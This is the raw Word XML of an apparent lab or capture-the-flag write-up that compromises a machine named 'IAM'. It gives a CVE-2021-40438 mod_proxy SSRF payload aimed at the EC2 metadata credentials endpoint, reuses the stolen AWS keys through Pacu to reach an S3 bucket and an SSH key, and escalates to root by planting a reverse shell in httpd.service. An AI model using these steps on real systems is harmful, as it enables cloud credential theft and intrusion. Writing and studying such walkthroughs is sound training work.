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IAM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uzuek9r2udo1"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xb50c57awh5s"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930400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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3d4c1ga30ci1" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">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RPCBIND</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139 - NETBIOS-SSN</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445 - SAMBA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">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3306 - MYSQL</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port 80, we see that the Apache version is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.48</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03600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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83100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Apache version is vulnerable to SSRF in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mod_proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of apache2. I will leave a link with more detailed information:</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mod_proxy</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Building a POC for CVE-2021-40438</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hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://firzen.de/building-a-poc-for-cve-2021-40438</w:t>
        </w:r>
      </w:hyperlink>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machine name already gives us a hint (IAM), we can query the instance and retrieve specific information from AWS EC2 and, in the worst case, temporary credentials attached to AWS EC2 -  </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://169.254.169.254/</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19">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can access the metadata instance, available through an APIPA range IP over HTTP:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ok1tws8vmdna" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC</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unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...</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|http://169.254.169.254/latest/meta-data/iam/security-credentials/</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Or:</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"http://&lt;site&gt;/?unix:$(python3 -c 'print("A"*7701, end="")')|http://169.254.169.254/latest/meta-data/iam/security-credentials/"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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send the PoC. I will use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 to intercept our request so we can manipulate it easily.</w:t>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16300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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749800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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send the request to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater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06700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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obtain the Role name </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MACHINE_IAM_ROLE. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will send the request again, passing the ROLE name:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://169.254.169.254/latest/meta-data/iam/security-credentials/MACHINE_IAM_ROLE</w:t>
        </w:r>
      </w:hyperlink>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067300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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here we have the temporary credentials attached to AWS EC2.</w:t>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43200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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ulygnbq4ultt" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pacu</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use the tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pacu</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0">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Pacu is an open-source AWS exploitation framework designed for offensive security testing in cloud environments. Created and maintained by Rhino Security Labs, Pacu allows pentesters to exploit misconfigurations in an AWS account using modules to easily expand its functionality. Current modules enable a variety of attacks, including IAM user privilege escalation, IAM user backdooring, attacks against vulnerable Lambda functions, and much more.</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GitHub - RhinoSecurityLabs/pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.</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hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/RhinoSecurityLabs/pacu</w:t>
        </w:r>
      </w:hyperlink>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Pacu open, I will run the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set_keys </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to set the access keys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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AccessKeyID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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SecretAccessKey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Token</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44900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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use the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">console </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which will generate a URL to access the AWS web console, allowing us to navigate through the graphical interface.</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81300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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the AWS web console, we go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">S3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and access the bucket </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">machine-iam-bucket </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">where we have read access.</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67100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Inside the bucket, we find our first flag and a user key </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">op-user-key.pem</w:t>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06700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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try to connect via SSH using this private key.</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40100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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gain access. Running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can see that we have permission to execute two commands as root without needing a password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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(ALL : ALL) NOPASSWD: /bin/systemctl restart httpd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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(ALL : ALL) NOPASSWD: /bin/systemctl daemon-reload</w:t>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0"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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4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httpd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the Apache HTTP server program. It is designed to run as a standalone daemon process. When used in this way, it creates a pool of child processes or threads to handle requests.</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privilege escalation process here is very simple. We can edit the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">httpd.service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file by inserting a reverse shell into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ExecStart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variable. For this, we must have write permission on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">httpd.service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</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need to locate the file:</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find / -type f -iname "httpd.service" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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70200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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locating the file path, we edit it and insert our reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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787900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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Start netcat to receive the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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14700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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execute the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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sudo /bin/systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>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sudo /bin/systemctl restart httpd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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62300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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our reverse shell as the root user 😀</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16300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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8">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="9"/>
    <w:bookmarkEnd w:id="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1"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9">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A">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6.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image6.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IAM</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RhinoSecurityLabs/pacu" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.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8.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.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4.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://firzen.de/building-a-poc-for-cve-2021-40438" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://169.254.169.254/latest/meta-data/iam/security-credentials/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://169.254.169.254/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://169.254.169.254/latest/meta-data/iam/security-credentials/MACHINE_IAM_ROLE" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.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H+i8Ui1XKv0zwizxAKWVk1Zj6g==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnV6dWVrOXIydWRvMTIOaC54YjUwYzU3YXdoNXMyDmguM2Q0YzFnYTMwY2kxMg5oLm9rMXR3czh2bWRuYTIOaC51bHlnbmJxNHVsdHQyDmguMTc1ZjVjczk0ejBvOAByITFCWEFXUnd5WGNBeEl1NUE1SkFxSXVlLXk3TERyXzVhNw==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